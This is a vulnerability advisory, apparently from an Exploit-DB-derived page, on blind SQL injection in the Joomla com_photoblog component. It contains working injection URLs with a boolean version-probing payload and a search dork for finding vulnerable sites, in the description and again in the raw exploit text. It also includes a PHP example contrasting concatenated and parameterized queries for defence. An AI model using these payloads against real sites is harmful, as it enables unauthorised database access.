by: ALTBTA
CVSS: 5.5 (MEDIUM)
CWE: Blind SQL Injection
Patch Exists: NO

Joomla (com_photoblog) Blind SQL Injection Vulnerability

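The Joomla component com_photoblog is vulnerable to blind SQL injection. The advisory lists two injection points: the id parameter of detail.php (www.site.com/detail.php?id=[Blind SQL INJECTION]) and the component's images view, where a boolean condition is appended after the blog parameter (www.site.com/index.php?option=com_photoblog&view=images&category=1&celebs&blog=1+and substring(@@version,1,1)=5). That condition is true only when the database version string begins with 5, so the difference between the page's responses to a true and a false condition discloses data one comparison at a time.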

Mitigation:

To mitigate this vulnerability, it is recommended to apply the latest patches and updates provided by Joomla. Additionally, input validation and parameterized queries should be implemented to prevent SQL injection attacks.
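
The mitigation above (validate the input, then use a parameterized query), shown as an added example that is not code from com_photoblog or Joomla. The table, column and function names are hypothetical, an in-memory SQLite database stands in for the site's database, and the inputs are constructed.

```php
<?php
// Added example: schema and function names are hypothetical, not taken from
// com_photoblog. Requires the pdo_sqlite extension; runs fully offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE images (id INTEGER PRIMARY KEY, category INTEGER, blog INTEGER, title TEXT)');
$db->exec("INSERT INTO images (category, blog, title) VALUES (1, 1, 'a'), (1, 1, 'b'), (1, 2, 'c')");

// Weak pattern: request values are pasted into the SQL text, so anything
// that follows the number becomes part of the WHERE clause.
function imagesConcatenated(PDO $db, string $category, string $blog): array
{
    $sql = "SELECT title FROM images WHERE category = $category AND blog = $blog";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened pattern: accept only positive integers, then bind them as
// parameters so the values can never change the statement's structure.
function imagesParameterized(PDO $db, string $category, string $blog): array
{
    $opts = ['options' => ['min_range' => 1]];
    $cat = filter_var($category, FILTER_VALIDATE_INT, $opts);
    $blg = filter_var($blog, FILTER_VALIDATE_INT, $opts);
    if ($cat === false || $blg === false) {
        throw new InvalidArgumentException('category and blog must be positive integers');
    }
    $stmt = $db->prepare('SELECT title FROM images WHERE category = :cat AND blog = :blog');
    $stmt->bindValue(':cat', $cat, PDO::PARAM_INT);
    $stmt->bindValue(':blog', $blg, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed inputs: a normal value, then a true and a false appended condition.
foreach (['1', '1 and 1=1', '1 and 1=2'] as $blog) {
    $weak = count(imagesConcatenated($db, '1', $blog));
    try {
        $safe = count(imagesParameterized($db, '1', $blog)) . ' rows';
    } catch (InvalidArgumentException $e) {
        $safe = 'rejected';
    }
    printf("blog=%-12s concatenated: %d rows   parameterized: %s\n", "'$blog'", $weak, $safe);
}
```

In the concatenated version the row count follows the truth of the appended condition, which is the signal a blind injection depends on; the hardened version rejects both non-integer inputs before any SQL runs.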

Exploit-DB raw data:

Joomla (com_photoblog) Blind Sql Injection Vulnerability
========================================================

####################################################################
.:. Author : ALTBTA [L_9@HoTmIL.CoM]
.:. Home : v4-team.com/cc
.:. Script : Joomla
.:. Download Script: http://webguerilla.net/downloads/3-components-for-joomla-1
.:. Bug Type : Blind Sql Injection
.:. Dork : inurl:"com_photoblog"

####################################################################

===[ Exploit ]===

www.site.com/detail.php?id=[Blind SQL INJECTION]


www.site.com/index.php?option=com_photoblog&view=images&category=1&celebs&blog=1+and substring(@@version,1,1)=5

####################################################################

Greats T0: aB0-3tH4b T3rR0r & RxH